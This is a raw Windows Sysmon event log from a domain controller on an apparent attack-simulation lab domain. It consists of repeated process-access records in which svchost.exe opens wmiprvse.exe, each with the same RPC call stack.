13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
